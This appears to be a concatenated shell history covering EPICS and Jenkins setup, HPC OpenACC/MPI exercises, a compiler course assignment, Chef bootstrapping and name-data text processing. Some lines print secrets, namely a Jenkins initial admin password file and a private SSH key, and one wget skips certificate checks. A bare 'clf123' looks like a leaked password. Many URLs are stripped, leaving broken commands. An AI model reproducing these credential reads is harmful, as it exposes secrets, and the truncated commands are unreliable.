-l +chsh -s /usr/bin/zsh +exit +exit +zsh +exit +source .exit +exit +zsh +zsh +echo $SHELL +chsh +chsh -l +man chsh +finger +man finger +perl -e '@x=getpwuid($<); print $x[8]' +perl -e '@x=getpwuid($<); print $x[8]' +echo $SHELL +ping google.com +ping google.com +ping google.com +ping google.com +ls +ls net* +vim networks +nettrace +netstat +ping google +ping google.com +ping google.com +ping http:\\wwwcache.dl.ac.uk\proxy.poc +ping +ping google.com +ping bbc.co.uk +ping bbc.co.uk +netstat +netreport +netstat--help +netstat-h +netstat -h +netstat -s +netstat -h +netstat -i +netstat -l +locate login.defs +vim /etc/login.defs/etc/login.defs +vim /etc/login.defs/etc/login.defs +usermod 500 epics +su +su +sudo disable firewall +su +uid +uid epics +id epics +pwd +ls +ls -alrh +pwd +pwd +ls +id +su +exit +echo $EPICS_BASE +echo $EPICS_BASE +pwd +pwd +pwd +su +sudo ls +sudo ls +clf123 +sudo ls +sudo pwd +pwd +mkdir extentions +ls +pwd +rmdir extensions +ls +rmdir extentions/ +ls +ls +mkdir extentions +ls +ln -s base- base +ls +ls -altrh +su +pwd +ls +rm -rf Music Public Videos Templates Pictures +ls +pwd +ls +rm Screenshot\ from\ 2015-11-12\ 14\:24\:17.png +ls +ls -altrh +su +pwd +ls +is +id +ls +source set_environment.script +echo $EPICS_BASE +pwd +ls +exit +ls +bash set_environment.script +echo $EPICS_BASE +exit +echo $EPICS_BASE + echo $EPICS_BASE + echo $EPICS_BASE | grep set + echo $EPICS_BASE +pwd +exit +$EPICS_BASE +echo $EPICS_BASE +exit +echo $EPICS_BASE +echo $EPICS_BASE +exit +echo $EPICS_BASE +exit +bash -x +bash --help +bash -x -l +bash -l +bash -l +bash +bash -l +bash -l +exit +ls +gedit .bash_profile +ls +pwd +ls +ls -alrf +ls -alrh +ls +pwd +ls +ls +pwd +ls +ls +ls -altrh +id +id +pwd +ls +gedit set_environment.script +ls -altrh +id +su +sudo chown epics:epics set_environment.script +ls -alrth +edit set_environment.script +gedit set_environment.script +vim .bash_profile +echo $EPICS_BASE +exit +echo $EPICS_BASE +echo $EPICS_BASE +exit +echo $EPICS_BASE +echo $PATH +bash -l +bash -l +bash +echo $EPICS_BASE +bash --debugger +ls +gedit .bash_profile +echo $EPICS_BASE +ls +chmod 755 set_environment.script +echo $EPICS_BASE +gedit .bash_profile +ls +id +gedit .bashrc +gedit .bashrc +pwd +ls +ls +ls +ls +ls +vim RELEASE +pwd +ls +ls -larth +cat RULES_DIRS +cat RULES_TOP +cat cat CONFIG_SITE +cat RELEASE +pwd +ls +ls +cat README +pwd +ls +ls +make clean uninstall +make +sudo yum search Intrinsic +sudo yum install libXaw.x86_64 +make +sudo yum search Motif +sudo yum install motif.x86_64 motif-devel.x86_64 +sudo yum install libgif libpng +make +sudo yum search Xtst +sudo yum install libXtst.x86_64 libXtst-devel.x86_64 + +sudo yum search giflib +sudo yum install giflib-devel.x86_64 giflib.x86_64 +make +pwd +ls +locate configure +sudo yum install xorg-x11-fonts* +edm +pwd +pwd +ls +pwd +pwd +ls +rm set_environment.script~ +vim set_environment.script +echo $EPICS_EXTENSIONS +vim set_environment.script +wget --no-cookies --no-check-certificate --header "Cookie: gpw_e24=http%3A%2F%2Fwww.oracle.com%2F; oraclelicense=accept-securebackup-cookie" " +tar xzf jdk-8u151-linux-x64.tar.gz +alternatives --install /usr/bin/java java /opt/jdk1.8.0_151/bin/java 2 +alternatives --config java +alternatives --install /usr/bin/java java /opt/jdk1.8.0_151/bin/java 2 +alternatives --config java +clear +java -version +export JAVA_HOME=/opt/jdk1.8.0_151 +export JRE_HOME=/opt/jdk1.8.0_151/jre +export PATH=$PATH:/opt/jdk1.8.0_151/bin:/opt/jdk1.8.0_151/jre/bin +clear +echo $JAVA_HOME +wgetst/maven/maven-3/3.5.2/binaries/apache-maven-3.5.2-bin.tar.gz +sudo tar xzf apache-maven-3.5.2-bin.tar.gz +sudo ln -s apache-maven-3.5.2 maven +sudo vi /etc/profile.d/maven.sh +source /etc/profile.d/maven.sh +clear +mvn -version +sudo wget -O /etc/yum.repos.d/jenkins.repos.io/redhat-stable/jenkins.repo +sudo rpm --imports.io/redhat-stable/jenkins.io.key +yum install jenkins +service jenkins start +cat /var/lib/jenkins/secrets/initialAdminPassword +yum install git +ping co.com +yum install git +echo $JAVA_HOME +echo $MAVEN_HOME +mvn -version +echo $JAVA_HOME +java -version +ls +ls +ls +pwd +ls +pwd +service jenkins start +ls +ls +echo $MAVEN_HOME +mvn -version +ls +ls +ls +ls +vi maven t +ls +ls +ls +ls +ls +ls +ls +ls +ls +cat build.xml +ls +cat log +clear +ced /var/lib/jenkins +ls +ping in.com +ping co.com +cp -r ~training/Exercises . +cp ~training/ .bashrc . +cp ~training/.bashrc . +pgcc test.c +pgf90 test.f90 +ls +a.out +ls +vi test.c +ls +vi test.f90 +pgcc test.v +pgcc test.c +ls +a.out +pgf90 test.f90 +ls +rm a.out +ls +pgf90 test.f90 +ls +a.out +rm a.out +pgcc test.c +ls +a.out +ls +interact +ls +vi prime_serial.c +ls +ls +ls +ls +ls +ls +vi prime_serial.c +pgf90 prime_serial.f +ls +a.out +vi prime_serial.c +vi prime_serial.f +ls +interact -n 28 +ls +ls +ls +ls +interact -n 4 +ls +ls +ls +cp ~training/gpu.job ~/Exercises/OpenACC/ +ls +cp laplace_serial.c laplace_acc.c +ls +vi laplace_acc.c +ls +pgcc -acc -Minfo=accel laplace_acc.c +sbatch gpu.job +ls +vi slurm-3081361.out +pgcc laplace_acc.c +ls +a.out +pgcc laplace_acc.c +a.out +ls +vi gpu.job +ls +ls +cp laplace_bad_acc.c ../ +ls +ls +cp laplace_bad_acc.c laplace_data_manag_acc.c +ls +vi laplace_data_manag_acc.c +pgcc -acc -Minfo=accel laplace_data_manag_acc.c +sbatch gpu.job +ls +vi slurm-3081863.out +vi laplace_data_manag_acc.c +pgcc -acc -Minfo=accel laplace_data_manag_acc.c +sbatch gpu.job +ls +vi slurm-3082007.out +pgcc -acc -Minfo=accel laplace_data_manag_acc.c +sbatch gpu.job +ls +vi slurm-3082109.out +ls +vi slurm-3082109.out +ls +vi laplace_data_manag_acc.c +pgcc -acc -Minfo=accel laplace_data_manag_acc.c +vi laplace_data_manag_acc.c +pgcc -acc -Minfo=accel laplace_data_manag_acc.c ; sbatch gpu.job +ls +vi slurm-3082169.out +vi laplace_data_manag_acc.c +pgcc -acc -Minfo=accel laplace_data_manag_acc.c ; sbatch gpu.job +ls +vi slurm-3082212.out +vi laplace_data_manag_acc.c +pgcc -acc -Minfo=accel laplace_data_manag_acc.c ; sbatch gpu.job +ls +vi slurm-3082242.out +vi laplace_data_manag_acc.c +pgcc -acc -Minfo=accel laplace_data_manag_acc.c ; sbatch gpu.job +ls +vi slurm-3082284.out +vi laplace_data_manag_acc.c +pgcc -acc -Minfo=accel laplace_data_manag_acc.c ; sbatch gpu.job +ls +vi slurm-3082322.out +pgcc -acc -Minfo=accel laplace_data_manag_acc.c ; sbatch gpu.job +ls +vi slurm-3082342.out +pgcc -acc -Minfo=accel laplace_data_manag_acc.c ; sbatch gpu.job +ls +vi slurm-3082364.out +vi slurm-3082342.out +pgcc -acc -Minfo=accel laplace_data_manag_acc.c ; sbatch gpu.job +ls +vi slurm-3082374.out +ls +pgcc -acc -Minfo=accel laplace_data_manag_acc.c ; sbatch gpu.job +ls +vi slurm-3082399.out +ls +ls +cp ~training/.bashrc . +logoff +ls +ls +pgcc -acc -Minfo=accel laplace_data_manag_acc.c ; sbatch gpu.job +ls +vi slurm-3082513.out +module swap pgi pgi/18.1 +pgcc -acc -Minfo=accel laplace_data_manag_acc.c ; sbatch gpu.job +ls +vi slurm-3082576.out +module swap pgi pgi/18.1 +pgcc -acc -Minfo=accel laplace_data_manag_acc.c ; sbatch gpu.job +ls +pgcc -acc -Minfo=accel laplace_data_manag_acc.c ; sbatch gpu.job +ls +vi slurm-3082644.out +ls +ls +rm slurm-308* +ls +vi laplace_data_manag_acc.c +pgcc -acc -Minfo=accel laplace_data_manag_acc.c; export PGI_ACC_TIME=1; +sbatch gpu.job +ls +vi slurm-3084482.out +ls +pgcc -acc -Minfo=accel laplace_data_manag_acc.c; export PGI_ACC_TIME=1; +ls +rm a.out +pgcc -acc -Minfo=accel laplace_data_manag_acc.c; export PGI_ACC_TIME=1; +ls +sbatch gpu.job +ls +vi slurm-3084499.out +pgcc -acc -Minfo=accel laplace_data_manag_acc.c; +sbatch gpu.job +ls +vi slurm-3084515.out +vi laplace_data_manag_acc.c +module swap pgi pgi/18.1 +pgcc -acc -Minfo=accel laplace_data_manag_acc.c; export PGI_ACC_TIME=1; +sbatch gpu.job +ls +vi slurm-3084534.out +vi laplace_data_manag_acc.c +ls +cp laplace_data_manag_acc.c laplace_data_manag_acc_best.c +ls +vi laplace_data_manag_acc_best.c +pgcc -acc-Minfo=accel laplace_data_manag_acc_best.c +pgcc -acc -Minfo=accel laplace_data_manag_acc_best.c +ls +sbatch gpu.job +ls +vi slurm-3084615.out +module swap pgi pgi/18.1 +pgcc -acc -Minfo=accel laplace_data_manag_acc_best.c +sbatch gpu.job +ls +vi slurm-3084642.out +export PGI_ACC_TIME=0 +pgcc -acc -Minfo=accel laplace_data_manag_acc_best.c +sbatch gpu.job +ls +vi slurm-3084652.out +ls +ls +ls +vi circ_shift_exercise.c +interact -n 8 +vi ./bashrc +ls +rm bashrc +ls +vi ~/.bashrc +source ~/.bashrc +ls +ls +mpirun -n 8 circ_shift_exercise.c +mpirun circ_shift_exercise.c +vi circ_shift_exercise.c +ls +mpirun circ_shift_exercise.c +ls +rm a.out +ls +mpicc circ_shift_exercise.c +vi circ_shift_exercise.c +mpicc circ_shift_exercise.c +ls +mpirun -n 8 a.out +ls +vi circ_shift_exercise.c +mpirun -n 8 a.out +mpicc circ_shift_exercise.c +mpirun -n 8 a.out +vi circ_shift_exercise.c +mpicc circ_shift_exercise.c +ls +rm a.out +ls +mpicc circ_shift_exercise.c +ls +mpirun -n 8 a.out +ls +ci circ_shift_exercise.c +ls +vi circ_shift_exercise.c +vi circ_shift_now.c +mpicc circ_shift_now.c +vi circ_shift_now.c +mpicc circ_shift_now.c +mpirun -n 8 a.out +viirc_shift_now.c +vi circ_shift_now.c +mpicc circ_shift_now.c +mpirun -n 8 a.out +vi circ_shift_exercise.c +mpicc circ_shift_exercise.c +mpirun -n 8 circ_shift_exercise.c +vi circ_shift_exercise.c +mpicc circ_shift_exercise.c +ls +a.out +mpirun -n 8 circ_shift_now.c +mpirun -n 8 circ_shift_exercise.c +ls +ls +ls +vi laplace_my_mpi.c +ls +ls +quit +ls +ls +vi laplace_my_mpi.c +ls +vi laplace_my_mpi.c +ls +ls +interact -n 4 +ls +ls +ls +vi laplace_data_manag_acc.c +vi laplace_data_manag_acc_best.c +ls +vi laplace_acc.c +vi laplace_data_manag_acc_best.c +mpicc -acc laplace_data_manag_acc_best.c +ls +ls +ls +mkdir BC_Challenge +ls +ls +git clone +ls +ls +vi laplace_MPI +ls +rm laplace_imp laplace_hybrd laplace_MPI laplace_MPI.out laplace_mpi_sol_org +ls +vi bc_ch.job +ls +ls +ls +ls +ls +mkdir bc_chlg.job +ls +rm -r bc_chlg.job/ +ls +vi bc_chlg.job +ls +rm a.out +mpiicc laplace_MPI.c -fast +mpicc laplace_MPI.c +mpiicc laplace_MPI.c +mpicc laplace_MPI.c -fast +ls +vi bc_chlg.job +sbatch bc_chlg.job +ls +vi slurm-3191916.out +vi bc_chlg.job +ls +rm slurm-3191916.out +ls +sbatch bc_chlg.job +ls +vi slurm-3191919.out +rm slurm-3191919.out +ls +vi bc_chlg.job +sbatch bc_chlg.job +ls +vi slurm-3191920.out +vi gpu.job +vi bc_chlg.job +ls +rm slurm-3191920.out +ls +sbatch bc_chlg.job +ls +vi slurm-3191924.out +vi gpu.job +cp laplace_MPI.c laplace_MPI_seun.c +ls +vi laplace_MPI_seun.c +mpicc laplace_MPI_seun.c -fast +vi laplace_MPI_seun.c +mpicc laplace_MPI_seun.c -fast +ls +rm a.out +ls +mpicc laplace_MPI_seun.c -fast +ls +sbatch bc_chlg.job +ls +rm slurm-3191924.out +ls +vi slurm-3191935.out +rm slurm-3191935.out +ls +vi bc_chlg.job +sbatch bc_chlg.job +ls +vi slurm-3192018.out +ls +vi slurm-3192018.out +rm slurm-3192018.out +ls +vi bc_chlg.job +sbatch bc_chlg.job +ls +vi slurm-3192019.out +ls +mpirun -np 16 a.out +mpirun -np 25 a.out +interact -N 4 -n 112 +ls +ls +ls +ls +ls +vi bc_chlg.job +sbatch bc_chlg.job +ls +vi slurm-3192019.out +rm slurm-3192019.out +ls +vi slurm-3193682.out +ls +rm slurm-3193682.out +vi bc_chlg.job +interact -N 4 -n 112 +sbatch -p RM -t 5:00:00 -N 1 bc_chlg.job +ls +vi slurm-3193695.out +rm slurm-3193695.out +ls +vi bc_chlg.job +sbatch bc_chlg.job +squeue -j 3193706 +ls +vi slurm-3193706.out +rm slurm-3193706.out +ls +vi bc_chlg.job +sbatch bc_chlg.job +ls +squeue -j 3193711 +ls +vi slurm-3193711.out +rm slurm-3193711.out +ls +vi bc_chlg.job +sbatch bc_chlg.job +ls +squeue -j 3193729 +ls +squeue -j 3193729 +ls +squeue -j 3193729 +ls +vi slurm-3193729.out +vi bc_chlg.job +ls +sbatch bc_chlg.job +ls +squeue -j 3193824 +ls +squeue -j 3193824 +ls +squeue -j 3193824 +ls +squeue -j 3193824 +ls +vi slurm-3193824.out +ls +Exercises/ +ls +ls +ls +vi slurm-3193729.out +vi bc_chlg.job +sbatch bc_chlg.job +ls +vi slurm-3193824.out +ls +vi slurm-3193837.out +rm a.out +mv laplace_MPI_seun.c laplace_MPI_test2.c +ls +git status +git add . +ls +git status +git add bc_chlg.job laplace_MPI_test2.c slurm-3193729.out slurm-3193824.out slurm-3193837.out +git commit -m "Multiple node is not working yet" +git push +ls +ls +cls +ls +ls +vi bc_chlg.job +sbatch bc_chlg.job +ls +squeue -j 3194426 +ls +vi slurm-3194426.out +vi bc_chlg.job +sbatch bc_chlg.job +squeue -j 3194441 +ls +git status +git add . +squeue -j 3194441 +vi slurm-3194426.out +squeue -j 3194441 +ls +vi slurm-3194441.out +git status +git add bc_chlg.job slurm-3194426.out slurm-3194441.out +git commit -m "Multiple nodes is now working" +git push +sudo update jenkins-server +yum update jenkins-server +apt-get update jenkins-server +ls +docker ps +exit +ls +vi cool-tree.java + +vi cool-tree.java +javac cool-tree.java +vi cool-tree.java +make semant +./mysemant_b grading/dispatch.test > out +vi out +vi garding/dispatch.test +vi grading/dispatch.test +vi out +vi cool-tree.java +make semant +./mysemant_b grading/dispatch.test > out +vi out +vi cool-tree.java +make semant +./mysemant_b grading/dispatch.test > out +vi out +diff out grading/dispatch.test.out |more +ls +ls -lt|more + cd test-output +ls +more *.diff +ls +vi dispatch.test +more dispatch.test.out +vi dispatch.test +ls -lt|more +more anattributenamedself.test +more anattributenamedself.test.out +vi ClassTable.java +ls +more an* +ls -lt|more +more badargs1.test +ls -lt badargs1.test.out +more badargs1.test.out +more baddispatch.test +more baddispatch.test.out +ls -l bad* +vi badarith.test +more badequalitytest* +ls -lt self* +more self* +vi cool-tree.java +more selftypeparameterposition.test +ls +vi ClassTable.java +javac cool-tree.java +make semant +./mysemant_b grading/dispatch.test > out +vi out +./mysemant_b grading/dispatch.test +./mysemant_b grading/dispatch.test|more +./mysemant_b grading/dispatch.test|more + vi cool-tree.java +make semant +./mysemant_b grading/dispatch.test|more + vi cool-tree.java +./mysemant_b grading/baddispatch.test > out +vi out +./mysemant_b grading/baddispatch.test > out +vi out + vi cool-tree.java +make semant + vi cool-tree.java +make semant +./mysemant_b grading/baddispatch.test > out +vi out +vi cool-tree.java +./mysemant_b grading/selftypeparameterpositiontest.test > out +./mysemant_b grading/selftypeparameterposition.test >out +vi out + vi cool-tree.java +make semant +./mysemant_b grading/selftypeparameterposition.test >out +vi out +vi ClassTable.java +make semant +vi ClassTable.java +make semant +./mysemant_b grading/selftypedeclared.test > out +./mysemant_b grading/selftyperedeclared.test > out +vi out +ls -l self* +vi selftypeparameterposition.test +ls -l self* +more selftypedeclared.test +more selftyperedeclared.test +more selftyperedeclared.test.out +ls -lt self* +ls +vi out +vi cool-tree.java +make semant +vi cool-tree.java +make semant +./mysemant_b grading/dispatch.test > out +vi out +vi cool-tree.java +make semant +./mysemant_b grading/dispatch.test > out +vi out +vi out +vi cool-tree.java +make semant +./mysemant_b grading/dispatch.test > out +vi out +vi cool-tree.java +vi cool-tree.java +vi cool-tree.java +make semant +vi Makefile +./mysemant_b grading/anattributenamedself.test > out +vi out +vi cool-tree.java +make semant +vi cool-tree.java +make semant +vi cool-tree.java +vi cool-tree.java +ls +ls +vi dispatch.test +vi basic.test +vi basic.test.ou +vi basic.test.out +ls -l|more +more static* +ls -lt static* +ls -lt dispatch.test +vi dispatch.test +ls -lt|more + more override* + ls -l over* +vi overrideingmethod2.test +vi overridingmethod2.test +vi overridingmethod3.test +vi overridingmethod3.test.out +vi overridingmethod4.test.out +vi overridingmethod4.test +vi overridingmethod4.test +vi overridingmethod.test +vi overridingmethod.test.out +ls -l|more +more tricky* +more tricky* +ls -l static* +vi static*.test +vi static*.test +ls -lt|more +more trickydispatch.test +more trickyatdispatch.test +more trickyatdispatch.test.out +more trickyatdispatch2.test +ls +git commit -m "changes on Feb 1, 2015" +git push +git status +git status|more +git add +git add . +git status|more +git commit -m "Chnages of Feb 1, 2015" +git remote -v +git push origin master +exit +vi cool-tree.java +make semant +./mysemant_b grading/basic.test > out +vi out +diff out grading/basic.test.out|more +vi cool-tree.java +make semant +./mysemant_b grading/dispatch.test > out +vi out +diff out grading/dispatch.test.out|more +./mysemant_b grading/overriderenamearg.test > out +vi out +diff grading/overriderenamearg.test out|more +diff grading/overriderenamearg.test.out out|more +./mysemant_b grading/overridingmethod2.test +./mysemant_b grading/overridingmethod2.test > out +vi out +diff grading/overridingmethod2.test.out out +diff grading/overridingmethod2.test.out out|more +./mysemant_b grading/overridingmethod3.test > out +vi out +./mysemant_b grading/overridingmethod4.test > out +vi out +./mysemant_b grading/overridingmethod.test > out +vi out +diff grading/overridingmethod.test out +diff grading/overridingmethod.test.out out +diff grading/overridingmethod.test.out out|more +vi cool-tree.java +ls -l .swp* +ls -al|more +rm .cool-tree.java.swp +vi cool-tree.java +make semant +vi cool-tree.java +make semant +./mysemant_b grading/staticdispatch.test > out +vi out +diff grading/staticdispatch.test.out out +diff grading/staticdispatch.test.out out|more + ls -lt|more +./mysemant_b grading/trickyatdispatch.test > out +viout +vi out +diff grading/trickyatdispatch.test.out out|more +diff grading/trickyatdispatch.test.out out|more +./mysemant_b grading/trickyatdispatch2.test > out +vi out +vi Methods.java +vi Node.java +ls +ls -l mysemant +more mysemant +ls +more mysemant +ls -l /bin/csh +ls -lt|more +ls +more *.out +ls +ls +ls +ls +ls -l|more +more dupformals.test +more dupformals.test.out +more if.test +more if.test.out +more if.test +more if.test +more if.test.out +ls -l while* +ls -l|more +ls -l|more +more badwhilebody.test +more badwhilebody.test.out +more badmethodcallsitself.test +more badmethodcallsitself.test.out +more badmethodcallsitself.test +ls -l|more +more inheritsbool.test +more inheritsbool.test.out +more inheritsobject.test +more inheritsObject.test +more inheritsObject.test.out +more inheritsObject.test +ls -lt|more +more methodnameclash.test +more methodnameclash.test.out +more methodnameclash.test +ls -l attr* +more attroverride.test +more attroverride.test.out +./mysemant_b grading/dupformals.test > out +vi out +./mysemant_b grading/if.test > out +vi out +diff grading/if.test.out out |more +./mysemant_b grading/badwhilebody.test > out +vi out +./mysemant_b grading/badmethodcallsitself.test > out +vi out +./mysemant_b grading/inheritsbool.test +./mysemant_b grading/inheritsbool.test > out +vi out +./mysemant_b grading/inheritsObject.test > out +vi out +diff out grading/inheritsObject.test.out +diff out grading/inheritsObject.test.out|more +./mysemant_b grading/methodnameclash.test > out +vi out +diff out grading/methodnameclash.test.out out|more +diff out grading/methodnameclash.test.out|more +./mysemant_b grading/methodnameclash.test > out +vi out +./mysemant_b grading/attroverride.test > out +vi out +ls +vi cool-tree.java +ls +vi cool-tree.java +ls +vi Node.java +jjj:q! +clea +clear +vi cool-tree.java +vi cool-tree.java +make semant +./mysemant_b grading/methodnameclash.test > out +vi out +vi cool-tree.java +make semant +./mysemant_b grading/methodnameclash.test > out +vi ou +vi out +./mysemant_b grading/methodnameclash.test > out +vi out +vi cool-tree.java +make semant +./mysemant_b grading/methodnameclash.test > out +vi out +exit +ls +vi Node.java +ls +ls -lt|more +vi dupformals.test +ls -lt|more +more methodnameclash.test +ls +ls +vi methodnameclash.test +ls -lt attroverride.test +vi attroverride.test +vi cool-tree.java +javac cool-tree.java +vi cool-tree.java +javac cool-tree.java +vi cool-tree.java +javac cool-tree.java +vi cool-tree.java +javac cool-tree.java +vi cool-tree.java +javac cool-tree.java +make semant +./mysemant_b grading/methodnameclash.test > out +vi out +vi cool-tree.java +vi ClassTable.java +vi ClassTable.java +vi cool-tree.java +vi cool-tree.java + +vi cool-tree.java +vi cool-tree.java +vi cool-tree.java +vi cool-tree.java +vi cool-tree.java +ls +more assignnoconform.test.out +more assignnoconform.test +more if.test +more if.test +vi if.test +vi if.test.out +vi if.test.out +vi if.test +ls +vi cool-tree.java +make semant +./mysemant_b grading/methodnameclash.test > out +vi out +vi cool-tree.java +make semant +./mysemant_b grading/methodnameclash.test > out +vi cool-tree.java +vi cool-tree.java +javac cool-tree.java +make semant +make semant +make semant +make semant +make semant +./mysemant_b grading/anattributenamedself.test > out +vi out +make semant +./mysemant_b grading/anattributenamedself.test > out +vi out +./mysemant_b grading/assignmentnoconform.test +./mysemant_b grading/assignnoconform.test +make semant +./mysemant_b grading/anattributenamedself.test > out +./mysemant_b grading/methodnameclash.test > out +vi out +diff out grading/methodnamec +vi Node.java +make semant +make semant +diff out grading/if.test > out +vi out +./mysemant_b grading/if.test > out +vi out +diff out grading/if.test.out|more +vi out +make semant +./mysemant_b grading/if.test > out +vi out +make semant +./mysemant_b grading/if.test > out +vi out +make semant +./mysemant_b grading/if.test > out +ls +ls -lt cool-tree.java +vi cool-tree.java +vi out +exit +ls +vi cool-tree.jav +vi cool-tree.java +make semant +./mysemant_b grading/if.test > out +vi out +vi out +diff out grading/if.test.out|more +ls +vi cool-tree.java +ls +vi cool-tree.java +make semant +vi cool-tree.java +vi cool-tree.java +./mysemant_b grading/simplecase.test > out +vi out +diff out grading/simplecase.test.out|more +make semant +more Node.java +make semant +ls +more simplecase.test +more simplecase.test.out +more simplecase.test +ls *case* +more caseidenticalbranch.test +more caseidenticalbranch.test.out +ls +ls +ls +ls +ls +ls +ls +ls +more README.SKEL + ls -lt +more CgenNode.java.* +ls -la +man gpg +gpg --gen-key +ls -la +which git +exit +find . -name * +find . -name *.txt +dd if=/dev/random of=/dev/null +dd if=/dev/urandom of=/dev/null +exit +wgets.chef.io/files/stable/chefdk/3.6.57/el/7/chefdk-3.6.57-1.el7.x86_64.rpm +yum install wget +sudo su +ls -lrt +ls -lrt +ls -lrt +git cloneshmagar/jenkins_bk.git +yum install git +sudo yum install git +ls -lrt +git cloneshmagar/jenkins_bk.git +git init +sudo su +ls -la +ls -lrt +ls -lrt +ls -la +ls -lrt +rm -rf shmagar.pem +sudo su +ls -la +ssh shraddha_magar5@ +ls -la +ssh-keygen +ls -la +ls -lrt +cat id_rsa +ls -la +cat id_rsa.pub +ssh shraddha_magar5@ +ssh shraddha_magar5@ +knife bootstrap --ssh-user shraddha_magar5 -- sudo --node-name node1 +knife bootstrap --ssh-user shraddha_magar5 -- sudo -N node1 +ls -lrt +ls -lrt +ls -la + +ls -lrt +knife bootstrap --ssh-user 'shraddha_magar5' --sudo -N node1 +ls -lrt +ls -lrt +ls -lrt +ls -la +ls -lrt +wgetshmagar/jenkins_bk/blob/master/.chef/shmagar.pem +sudo su +ls -lrt +history +ls -lrt +ls -lrt +ls -lrt +ls -lrt +ls -lrt +ls -lrt +ls -lrt +cat hello.rb +ls -lrt +chef-apply hello.rb +vi hello.rb +cat hello.rb +ls -lrt +ls -lrt +ls -lrt +mkdie hello +sudo su +history +ls -lrt +history +ls -lrt +mkdir chef +ls -lrt +chef generate repo chef +ls -lrt +ls -lrt +ls -lrt +ls -lrt +ls -lrt +ls -lrt +ls -lrt +ls -lrt +cat example.json +ls -lrt +ls -lrt +ls -lrt +vi hello.rb +ls -lrt +chef generate cookbook hello1 +ls -lrt +sudo su +ls -la +ls -la +ls -lrt +cat id_rsa.pub +ls -lrt +ssh shraddha_magar5@ +ls -lrt +ls -lrt +knife bootstrap --ssh-user 'shraddha_magar5' --sudo -N node2 +ls -lrt +ls -lrt +cp example.json ntp.json +sudo su +ls -lrt +ls -lrt +ls -lrt +ls -lrt +ls -lrt +ls -lrt +vi httpd.rb +history +vim updater.bash +bash updater.bash +vim updater.bash +apt-cache search gem +sudo gem install -V lolcat +cowthink heyhey +sudo apt-get install fortune +fortune +man fortune +fortune -o +man fortune +fortune -o +fortune +fortune | cowsay | lolcat +fortune +fortune | cowsay +fortune | cowsay | lolcat +top +ls +ls +ls -lah | lolcat +sudo apt-get install sl +sl | lolcat +sl +sl | lolcat +ls -lah | lolcat +wgets.cs.princeton.edu/java/data/dickens.txt +sudo apt-get install rubygems +sudo apt-get install ruby | gem +history +which ruby +ruby --version +sudo apt-get install rubygems +sudo apt-get -qq update +sudo apt-get upgrade +sudo apt-get dist-upgrade +sudo apt-get install tmux +sudo apt-get upgrade -y vim +vim --version +ls +ll +pwd +top +ls +vim copyall.sh +ll /etc/skel/ +vim copyall.sh +vim bootsrap.sh +bash bootsrap.sh +ls +mkdir +ls -lah +ll +mkdir userdata +ls +mkdir names +vim name-sources.txt +ls +mkdir corpora && cd corpora +vim text-sources.txt +ls +ls +ls +ll +cowsay -d hello | lolcat +pinky | lolcat +pwd +sl +ls +pwd +ls +mkdir funnythings +ls +ls +pwd +touch hello.txt +ls +man ls +ls -ah +man ls +ls -lah +echo hi +echo hi > hello.txt +ls -lah +cat hello.txt +echo bobba > hello.txt +cat hello.txt +echo lalala >> hello.txt +cat hello.txt +pinky >> pinky.txt +cat pinky.txt +man wc +cat pinky.txt +wc -l pinky.txt +pinky >> pinky.txt +wc -l pinky.txt +wc -w pinky.txt +pinky >> pinky.txt +wc -w pinky.txt +cat pinky.txt +cat pinky.txt | grep user007 +man grep +cat pinky.txt | grep -C 2 user007 +cat pinky.txt | grep user007 +cat pinky.txt | grep user007 > superclient.txt +cat superclient.txt +ls +cat hello.txt +echo newtextfile > hello2.txt +ls +ls -lah +ls -lah | grep hello +cat hello* +cat hello* > hellocombined.txt +wc -l hellocombined.txt +ls +ls +ls +ls +ls -lah +ls +tree +sudo apt-get install tree +tree +ls +ls +tree +ls +pwd +tree +ls +cat name-sources.txt +ls +cat name-sources.txt +cat name-sources.txt +cat name-sources.txt | less +wget curlsus.gov/genealogy/www/data/1990surnames/dist.female.first | awk '{print $1}' +wget curlsus.gov/genealogy/www/data/1990surnames/dist.female.first +ls +cat name-sources.txt | less +cat name-sources.txt +ls +rm dist.female.first.1 +ls +cat dist.female.first +wc -l dist.female.first +ll +cat dist.female.first +cat dist.female.first | less +cat dist.female.first +head dist.female.first +tail dist.female.first +cat dist.female.first +cat dist.female.first | sort +cat dist.female.first | sort -r +cat dist.female.first | cut -d -f1 +cat dist.female.first | cut -d -k1 +cat dist.female.first | cut -d'' -k1 +cat dist.female.first | cut -d' ' -k1 +cat dist.female.first | cut -d' ' -f1 +cat dist.female.first +cat dist.female.first | cut -d' ' -f1 +cat dist.female.first | cut -d' ' -f2 +cat dist.female.first | cut -d' ' -f3 +cat dist.female.first | cut -d' ' -f4 +cat dist.female.first | cut -d' ' -f5 +cat dist.female.first | cut -d' ' -f6 +cat dist.female.first | cut -d'\t' -f6 +cat dist.female.first | cut -d'\t' -f2 +cat dist.female.first | cut -d't' -f2 +man cut +cat dist.female.first | cut -f2 +cat dist.female.first | awk '{ print $1 }' +cat dist.female.first | awk '{ print $2 }' +cat dist.female.first | awk '{ print $3 }' +cat dist.female.first | awk '{ print $4 }' +cat dist.female.first | awk '{ print $4 $1 }' +cat dist.female.first | awk '{ print $4,$1 }' +cat dist.female.first | awk '{ print $4 ## $1 }' +cat dist.female.first | awk '{ print $4 "##" $1 }' +cat dist.female.first | grep ann | awk '{ print $4 "##" $1 }' +cat dist.female.first | grep ann +cat dist.female.first | grep an +cat dist.female.first +cat dist.female.first | grep ann +cat dist.female.first | grep ANN +cat dist.female.first | grep ANN | awk '{ print $4 "##" $1 }' +cat dist.female.first | grep ANN | awk '{ print $4 "\t" $1 }' +cat dist.female.first | grep ANN | awk '{ print $4 "group :ann" $1 }' +cat dist.female.first | grep ANN | awk '{ print $4 "\tgroup :ann\t" $1 }' +cat dist.female.first | grep ANN | awk '{ print $4 "\tgroup :ann\t" $1 }' | wc -l +ls +cat name-sources.txt +wgetsus.gov/genealogy/www/data/1990surnames/dist.male.first +ls +cat dist.* | grep ANN | awk '{ print $4 "\tgroup :ann\t" $1 }' | wc -l +cat dist.male.first | grep ANN | awk '{ print $4 "\tgroup :ann\t" $1 }' | wc -l +cat dist.male.first | grep ANN | awk '{ print $4 "\tgroup :ann\t" $1 }' +ls +diff dist.female.first dist.male.first +man diff +diff dist.female.first dist.male.first +diff dist.female.first dist.male.first | less +ls +wc -l dist.* +cat dist* +cat dist* > dist.combined.names +ls +ls -l +wc -l dist.female.first dist.male.first +cat dist.female.first dist.male.first | md5sum +cat dist.combined.names | md5sum +cat dist.combined.names +echo . +echo . >> dist.combined.names +cat dist.combined.names +cat dist.combined.names | md5sum +cat dist.female.first dist.male.first | md5sum +vim dist.combined.names +cat dist.combined.names | 